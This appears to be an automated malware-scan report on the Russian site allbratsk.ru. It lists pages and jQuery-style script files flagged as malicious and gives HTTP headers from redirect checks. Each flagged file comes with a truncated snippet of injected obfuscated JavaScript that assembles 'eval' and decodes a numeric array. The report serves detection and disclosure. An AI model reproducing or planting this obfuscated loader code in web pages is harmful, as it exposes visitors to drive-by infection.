Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=allbratsk.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://allbratsk.ru/ | 200 OK Content-Length: 6141 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,115,119,97,106,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,11,7,32,31,30,29,115,119,97,106,46,114,112,96,32, Antivirus reports:
| ||
http://allbratsk.ru/js/jquery.1.7.1.js | 200 OK Content-Length: 96151 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 Antivirus reports:
| ||
http://allbratsk.ru/js/cufon.js | 200 OK Content-Length: 20545 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 Antivirus reports:
| ||
http://allbratsk.ru/js/jquery.mousewheel.js | 200 OK Content-Length: 4764 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 Antivirus reports:
| ||
http://allbratsk.ru/js/jquery.jscrollpane.min.js | 200 OK Content-Length: 16907 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 Antivirus reports:
| ||
http://allbratsk.ru/js/config.js | 200 OK Content-Length: 4135 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 Antivirus reports:
| ||
http://allbratsk.ru/js/script.js | 200 OK Content-Length: 17227 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115 Antivirus reports:
| ||
http://allbratsk.ru/../ | 400 Bad Request Content-Length: 226 Content-Type: text/html | clean |
http://allbratsk.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://allbratsk.ru/about.html | 200 OK Content-Length: 4176 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body/=2}catch(gdsgd){ww=window;v="va"+"l";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,115,119,97,106,32,60,30,97,111,98,115,106,101,109,114,43,99,113,99,94,116,100,67,105,101,108,99,107,116,39,37,102,102,113,95,106,101,38,39,56,13,9,11,7,32,31,30,29,115,119,97,106,46,114,112,96,32, Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: allbratsk.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 10:04:09 GMT
Accept-Ranges: bytes
ETag: "1a5495-17fd-4d532ef142ac0"
Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2
Content-Length: 6141
Content-Type: text/html
Last-Modified: Fri, 08 Feb 2013 09:10:43 GMT
...6141 bytes of data.
GET / HTTP/1.1
Host: allbratsk.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 10:04:09 GMT
Accept-Ranges: bytes
ETag: "1a5495-17fd-4d532ef142ac0"
Server: Apache/2.2.22 (FreeBSD) PHP/5.2.17 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/0.9.8q DAV/2
Content-Length: 6141
Content-Type: text/html
Last-Modified: Fri, 08 Feb 2013 09:10:43 GMT
...6141 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: allbratsk.ru
Referer: http://www.google.com/search?q=allbratsk.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: allbratsk.ru
Referer: http://www.google.com/search?q=allbratsk.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.